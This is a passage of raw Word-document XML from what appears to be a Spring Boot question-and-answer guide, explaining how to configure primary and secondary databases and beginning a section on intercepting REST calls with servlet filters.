        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA4BB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Secondary Database (e.g., PostgreSQL) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC86D5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D16C0A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CEA77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69EADA6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1C89D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85683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69EEEF1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0E56AC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E18395A" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="725D06F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Other dependencies --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E1005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3D6852F"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Configuration for Each Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C040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reate separate configuration classes for each database. These classes define the DataSource, EntityManagerFactory, and TransactionManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5584D0C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34B07A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configuration class for the primary database (e.g., DataSource1Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070D6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EC4C9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6B43DEF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nableJpaRepositories(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CE02A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Package for Primary Database Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B486E7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54C20A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332A9F6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3158A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122E7A4" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431D6A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A9612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4A5E4F1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1F0D4F5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5CAAA8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A0D6C2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FFA808A" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1821F1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693494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2125B9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3F464E3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733EE8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6E5344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0B8270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632AD2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  // Package for Primary Database Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0128A8F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0FE6439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FBB3B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CDF5A66" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9BAD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2511B5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0C92C0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74F3D8A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49CAFFB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BC0FE4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E89C4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BF19A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094792F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ly, create a configuration class for the secondary database (e.g., DataSource2Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE57F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E15BB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3D889C8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CE8C19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Package for Secondary Database Repositories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48581F6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77B90F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18629A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F7A14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50F35645" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22416C5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42E6D05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2BD3D8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92EFF3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B02979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D7D1F0B" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541CB78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6CB950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1C630F6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1F52EB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B1A306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46C0DA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6F79383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ackages("com.example.model.secondary")  // Package for Secondary Database Entities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186EE2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70ECD76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9114B8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8C9A92" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2812A2E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6E00B6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2C6A631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0867B9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E3215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2687A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39E5A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Database Properties in application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612CF41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onfigure the database properties for each database separately in the application.properties (or application.yml) file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149CF2E5"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41EFB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1396F23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20D643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6F6CEC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556873E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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233422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5Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223A0BE"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4BDA549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11EC0E3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27E9C99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4EE6900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7E2F1F0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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C701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PostgreSQLDialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D919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Repositories for Each Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16A76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ke sure your repositories are defined in the correct package. For the primary and secondary databases, you can have separate repository interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2186B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 Database Repositories</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in com.example.repository.primary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143AFCD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601B6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AD40D4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0EFCF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ondary Database Repositories</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in com.example.repository.secondary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B80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A47B06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0B46F94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D59918"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Use the Repositories in Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695EFD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service layer, you can inject the repositories for each database as needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F5CB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A3526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4113D15" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64611BA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C6ECB6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417D2FCA" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9F336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84844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epartmentRepository departmentRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4AF08" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604B81B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4BBB87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745A1EA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57F106" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C637B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epartment saveDepartment(Department department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37552F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Repository.save(department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A013D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7CAEAB1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3E745F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sing Multiple Databases in the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74B54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08F49">
          <v:rect id="_x0000_i2673" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B9D8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1B7CE3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multiple databases in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236DE87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atabase dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7C260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separate configuration classes for each database, setting up DataSource, EntityManagerFactory, and TransactionManager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC8E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JpaRepositories to specify the package for each database’s repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D752D7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the database properties for each database in application.properties or application.yml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D8E1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repositories for each database and inject them in the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2720BEC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is approach, you can easily manage multiple databases in a single Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD7B31" w14:textId="122191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674" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC1454" w14:textId="22CEE8A7" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="652" w:name="_Toc197867866"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does your application know I am using a particular database</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="652"/>
    </w:p>
    <w:p w14:paraId="5F2A6ABE" w14:textId="0F5F979F" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6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that uses multiple databases, the application knows which database to use through the configuration defined for each database. Specifically, Spring Boot identifies and uses a particular database based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> classes and the </w:t>
      </w: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 xml:space="preserve"> files. Here's how the application determines which database to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DEA4A"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Steps in Database Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D220EF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA5241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define separate @Configuration classes for each database, where you specify how each DataSource is configured (e.g., database URL, username, password).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067A5E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configuration classes also define the EntityManagerFactory and TransactionManager for each database. These beans tell Spring Boot how to manage the persistence context for each database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23549DA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Qualifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003110DA"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defining multiple DataSource beans, @Qualifier annotations are used to differentiate between the primary and secondary databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75601C63"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Spring Boot knows which DataSource to use when interacting with a particular database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DEDB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14054EFD"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atabase configurations (URLs, credentials, etc.) are specified in the application.properties or application.yml file using distinct property names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3FAA8"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 you might have spring.datasource.primary for the primary database and spring.datasource.secondary for the secondary database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3D91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Application Knows Which Database to Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CC544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e on Configuration Class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECAB4A2"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Spring Boot starts up, it scans the configuration classes (using @Configuration) for the beans related to the database connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A090"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annotation is used in the configuration of the primary database to indicate that it should be the default DataSource unless explicitly overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9C9BE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 DataSource or EntityManagerFactory is needed, Spring Boot looks for these beans in the respective configuration classes and injects them accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591728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 (Optional)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868108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instance, application-dev.properties and application-prod.properties might have different configurations for the databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDDAD3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Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224AEA61"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positories are set up for each database, you configure the package location with @EnableJpaRepositories to specify which database (and EntityManagerFactory) should be used for that repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E451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then automatically use the correct DataSource based on the repository’s configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D1929"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Walkthrough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B0E44"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rimary Database Configuration (DataSource1Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F0E6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3F8A5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04F09F7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1E22A53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For Primary DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A35E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1861EA5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7F67807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B7466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21548E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159B353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7E5645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4EA76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079CEE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2A86273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79BB9F4" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C39B65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3D14BB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5F79BC1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5C31FED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50A96A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0242A45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51A77A5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10E3D0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A48B8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12CC510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34D7C9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B1A126" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7FDEA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778EBC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39D084A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0F7DDD5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6AA181A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50F730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FAE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F2605F"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condary Database Configuration (DataSource2Config):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E68005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6E0FB2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20106F1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181E6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For Secondary DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F68F2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581E311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94DE2F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0842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43EAC64B" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20C5F6C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6598E75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35F0C8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136AE4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59C9A02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712E73E" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3E09E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360E5DE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603513E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6F48519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46FDA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builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1225661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3FCA0CC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559A76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1B78FF1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BDE6D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F0D0358" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614632F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5D1D17A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40211BD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5134D2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7280483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5E6F5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E354D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pplication.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739D6C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imary Database (MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2608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6D6CC2D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007CE3F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2416E6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3334C401" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A5018D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Secondary Database (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD64FC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61BEF39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759486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5DFCC7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457D147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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8628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7D3C88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52C0755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Employee DB (Primary Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61D74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08CAEBD" w14:textId="77777777" w:rsidR="00B56F6C" w:rsidRPr="002C6305" w:rsidRDefault="00B56F6C" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00184A6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EEA03D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32A1329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Department DB (Secondary Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E547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F9A7CD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4B445C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 xml:space="preserve"> define the database details and specify which DataSource to use for each database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6D9C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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation marks the default database (e.g., the primary database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3DC7B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alifier</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to specify which DataSource bean should be injected where multiple databases are configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26238D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specifies which repository corresponds to which DataSource and database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CECAF9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xml:space="preserve"> holds the configuration details, including the credentials and connection properties for each database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F18704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675" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4402D" w14:textId="45F16E35" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="653" w:name="_Toc197867867"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are REST calls intercepted in our project? How is the call happening</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="653"/>
    </w:p>
    <w:p w14:paraId="1CB09A53" w14:textId="7D10816C"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REST Calls are Intercepted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8D05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 (Servlet Filters)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBEA9DF"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part of the Servlet API and can be used to intercept and modify HTTP requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C87B67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useful for tasks like logging, authentication, and modifying headers or request bodies before they are processed by the rest of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6ECC2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define a filter that will be applied globally across your REST endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A58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Filter in Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42487EE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723A05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Filter implements Filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8341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AF3D8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oFilter(ServletRequest request, ServletResponse response, FilterChain chain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA9D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IOException, ServletException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA287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ervletRequest httpServletRequest = (HttpServletRequest) request;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F044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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972CE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Method: " + httpServletRequest.getMethod());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347471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72314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7BFA58" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3FFDF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23FF2A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init(FilterConfig filterConfig) throws ServletException {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D938C" w14:textId="77777777" w:rsidR="00C421B5" w:rsidRPr="002C6305" w:rsidRDefault="00C421B5" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
